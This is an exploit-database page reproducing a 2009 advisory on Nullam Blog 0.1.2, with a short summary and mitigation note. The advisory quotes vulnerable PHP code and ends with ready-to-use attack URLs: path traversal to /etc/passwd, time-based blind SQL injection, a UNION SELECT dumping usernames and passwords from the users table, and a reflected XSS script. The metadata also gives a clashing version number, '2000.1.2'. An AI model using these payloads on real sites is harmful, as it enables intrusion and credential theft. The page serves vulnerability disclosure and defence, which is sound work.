header-logo
Suggest Exploit
vendor:
Nullam Blog
by:
Salvatore Fresta aka drosophila
3.3
CVSS
LOW
Local File Inclusion, File Disclosure, Multiple Blind SQL Injection, SQL Injection, Reflected XSS
94, 200, 89, 79
CWE
Product Name: Nullam Blog
Affected Version From: 2000.1.2
Affected Version To: 2000.1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:nullam:nullam_blog:0.1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Nullam Blog Vulnerabilities

The Local File Inclusion vulnerability allows a guest to include a local file. The File Disclosure vulnerability allows a guest to view the content of a local file. The Multiple Blind SQL Injection and SQL Injection vulnerabilities allow a guest to inject SQL statements into the affected queries. The Reflected XSS vulnerability allows a guest to inject HTML and JavaScript code into the affected page.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in any SQL queries. Use parameterized queries to prevent SQL injection attacks. Use a web application firewall to detect and block malicious requests.
Source

Exploit-DB raw data:

-- 
Salvatore Fresta aka drosophila
CWNP444351
******** Salvatore "drosophila" Fresta ********

[+] Application: Nullam Blog
[+] Version: 0.1.2
[+] Website: http://nullam.net/

[+] Bugs: [A] Local File Inclusion
[B] File Disclosure
[C] Multiple Blind SQL Injection
[D] SQL Injection
[E] Reflected XSS

[+] Exploitation: Remote
[+] Date: 10 Sep 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***************************************************

[+] Bugs

The following flaws are tested on version 0.1.2.
Other versions may also be affected.

- [A] Local File Inclusion

[-] Risk: high
[-] File affected: index.php

This bug allows a guest to include a local file.

...

$static = false;

if(!isset($_GET['p'])) {

$include = "./pages/news.php";

} else {

$include = "./pages/" . $_GET['p'] . ".php";

}

...

if(!$static) {
include($include);
}

...

- [B] File Disclosure

[-] Risk: medium
[-] File affected: index.php

This bug allows a guest to view the content of a
local file.

...

if(isset($_GET['s'])) {
$static = true;
$include = "./pages/custom/" . $_GET['s'] . ".html";
}

...

if(!$static) {
include($include);
} else {
$pageSmarty = new Smarty;
$pageSmarty->assign('html', file_get_contents($include));

...

- [C] Blind SQL Injection

[-] Risk: medium
[-] File affected: news.php, register.php

These bugs allows a guest to inject SQL statements
into the affected queries.

- [D] SQL Injection

[-] Risk: high
[-] File affected: register.php

This bug allows a guest to inject SQL statements
into the affected query.

...

$result = mysql_query(sprintf("SELECT `uname`,`verified` FROM `users` WHERE `verifyHash`='%s' LIMIT 1;", $_GET['v'])) or die(mysql_error());
if(mysql_numrows($result) != 1) {
$msg = "Invalid verification hash! If you followed the link you received in your email please contact an admin and request a new verification email.";
} else {
$msg = "User " . mysql_result($result, 0, 'uname') . " successfully verified! you may now login using the form on the main page!";
}

...

***************************************************

[+] Code

- [A] Local File Inclusion

http://site/path/index.php?p=../../../../../../etc/passwd%00

- [B] File Disclosure

http://site/path/index.php?s=../../../../../../../etc/passwd%00

- [C] Multiple Blind SQL Injection

http://site/path/index.php?y=1&i=%25-1%25' OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23

http://site/path/index.php?p=register&v=1' OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23

- [D] SQL Injection

http://site/path/index.php?p=register&v=-1' UNION ALL SELECT GROUP_CONCAT(uname,0x3a,passwd),2 FROM users%23

- [E] Reflected XSS

http://site/path/index.php?p=error&e=<script>alert('XSS');</script>

***************************************************

[+] Fix

No fix.

***************************************************

# milw0rm.com [2009-09-10]

Navigation

Suggest Exploit

Services By CQR